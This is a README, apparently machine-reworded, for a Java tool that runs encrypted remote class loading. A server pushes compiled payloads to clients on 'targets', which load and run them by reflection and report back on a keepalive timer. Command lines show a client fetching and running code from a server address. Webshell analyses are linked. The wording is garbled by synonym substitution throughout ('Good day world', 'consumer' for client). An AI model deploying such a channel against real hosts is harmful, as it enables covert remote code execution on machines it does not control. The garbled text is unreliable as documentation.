This instrument permits you to ship Java bytecode within the type of class information to your purchasers (or potential targets) to load and execute utilizing Java ClassLoader along with Replicate API. The consumer receives the category file from the server and return the respective execution output. Payloads have to be written in Java and compiled earlier than beginning the server.
- Consumer-server structure
- Distant loading of Java class information
- In-transit encryption utilizing ChaCha20 cipher
- Settings outlined by way of args
- Keepalive mechanism to re-establish communication if server restarts
Device has been examined utilizing OpenJDK 11 with JRE Java Bundle, each on Home windows and Linux (zip transportable model). Java model needs to be 11 or larger on account of dependencies.
https://www.openlogic.com/openjdk-downloads
$ java -jar java-class-loader.jar -helputilization: Primary
-address <arg> deal with to attach (consumer) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> identify of technique to invoke (default: exec)
-classname <arg> identify of sophistication (default: Payload)
-client run as consumer
-help print this message
-keepalive retains the consumer getting classfile from server each
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it would generate a brand new one)
-port <arg> port to attach (consumer) / to bind (server)
-server run as server
Assuming you have got the next Good day World payload within the Payload.java
file:
//Payload.java
public class Payload {
public static String exec() {
String output = "";
strive {
output = "Good day world from consumer!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}
Then you need to compile and produce the respective Payload.class
file.
To run the server course of listening on port 1337 on all internet interfaces:
$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.classOperating as server
Server working on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
On the consumer aspect, it’s possible you’ll use the identical JAR package deal with the -client
flag and use the symmetric key generated by server. Specify the server IP deal with and port to connect with. You might also change the category identify and sophistication technique (defaults are Payload
and String exec()
respectively). Moreover, you’ll be able to specify -keepalive
to maintain the consumer requesting class file from server whereas sustaining the connection.
$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=Operating as consumer
Connecting to 192.168.1.73:1337
Obtained 593 bytes from server
Output from invoked class technique: Good day world from consumer!
Despatched 24 bytes to server
Confer with https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a weblog submit associated with the event of this instrument.
-
https://cyberandramen.internet/2022/02/18/a-tale-of-two-shells/
-
https://www.sangfor.com/weblog/cybersecurity/behinder-v30-analysis
-
https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7
-
https://venishjoe.internet/submit/dynamically-load-compiled-java-class/
-
https://customers.cs.jmu.edu/bernstdh/net/frequent/lectures/slides_class-loaders_remote.php
-
https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/
-
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html
-
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/mirror/Technique.html